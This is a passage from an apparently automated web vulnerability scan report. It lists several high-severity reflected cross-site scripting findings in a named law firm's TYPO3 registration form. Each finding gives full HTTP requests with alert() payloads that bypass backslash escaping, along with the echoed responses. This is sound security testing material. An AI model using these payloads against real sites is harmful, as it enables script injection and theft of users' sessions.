Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:06 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
[telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com');
   updateForm('fe_users_form','FE[fe_users][gender]','01afa4\\';alert(1)//fd66386815e');
   updateForm('fe_users_form','FE[fe_users][first_name]','');
   updateForm('fe_users_form','FE[fe_users][last_name]','');
   updateForm('fe_users_form','FE[fe_users][alias]','');
   updateForm('fe_users_f
...[SNIP]...

4.177. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bpassword%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bpassword%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e75e\'%3balert(1)//0f9cda18802 was submitted in the FE%5Bfe_users%5D%5Bpassword%5D parameter. This input was echoed as 7e75e\\';alert(1)//0f9cda18802 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=37e75e\'%3balert(1)//0f9cda18802&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:15 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27255

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<![CDATA[*/
   updateForm('fe_users_form','FE[fe_users][username]','RonaldSmith');
   updateForm('fe_users_form','FE[fe_users][password]','37e75e\\';alert(1)//0f9cda18802');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_form','FE[fe_users][address]','3');
   updateForm('fe_users_f
...[SNIP]...

4.178. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bpassword_again%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bpassword_again%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60b0\'%3balert(1)//10f8d4d5446 was submitted in the FE%5Bfe_users%5D%5Bpassword_again%5D parameter. This input was echoed as b60b0\\';alert(1)//10f8d4d5446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3b60b0\'%3balert(1)//10f8d4d5446&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:25 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27309

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
teForm('fe_users_form','FE[fe_users][module_sys_dmail_html]','');
   updateForm('fe_users_form','FE[fe_users][tx_pdmylibrary_news_user]','');
   updateForm('fe_users_form','FE[fe_users][password_again]','3b60b0\\';alert(1)//10f8d4d5446');
   updateForm('fe_users_form','FE[fe_users][0]','\'"-->
...[SNIP]...

4.179. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bstatic_info_country%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bstatic_info_country%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccd4\'%3balert(1)//f8c734f430 was submitted in the FE%5Bfe_users%5D%5Bstatic_info_country%5D parameter. This input was echoed as 4ccd4\\';alert(1)//f8c734f430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG4ccd4\'%3balert(1)//f8c734f430&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27243

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG4ccd4\\';alert(1)//f8c734f430');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm('fe_users_form','FE[fe_users][language]','');
   updateForm('fe_users_form','FE[fe_users][comments]','');
   updateForm('fe_users_fo
...[SNIP]...

4.180. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Btitle%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Btitle%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 107b8\'%3balert(1)//d84ea8e71ea was submitted in the FE%5Bfe_users%5D%5Btitle%5D parameter. This input was echoed as 107b8\\';alert(1)//d84ea8e71ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3107b8\'%3balert(1)//d84ea8e71ea&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:43 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
_form','FE[fe_users][last_name]','');
   updateForm('fe_users_form','FE[fe_users][alias]','');
   updateForm('fe_users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3107b8\\';alert(1)//d84ea8e71ea');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[
...[SNIP]...

4.181. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Busername%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Busername%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9168b\'%3balert(1)//a686935bb7e was submitted in the FE%5Bfe_users%5D%5Busername%5D parameter. This input was echoed as 9168b\\';alert(1)//a686935bb7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith9168b\'%3balert(1)//a686935bb7e&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:52 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<![CDATA[*/
   updateForm('fe_users_form','FE[fe_users][username]','RonaldSmith9168b\\';alert(1)//a686935bb7e');
   updateForm('fe_users_form','FE[fe_users][password]','3');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_
...[SNIP]...

4.182. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bzip%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bzip%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae89\'%3balert(1)//e69150d97f4 was submitted in the FE%5Bfe_users%5D%5Bzip%5D parameter. This input was echoed as bae89\\';alert(1)//e69150d97f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3bae89\'%3balert(1)//e69150d97f4&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:27:04 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27286

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][alias]','');
   updateForm('fe_users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3bae89\\';alert(1)//e69150d97f4');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('f
...[SNIP]...

4.183. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bzone%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bzone%5D request parameter is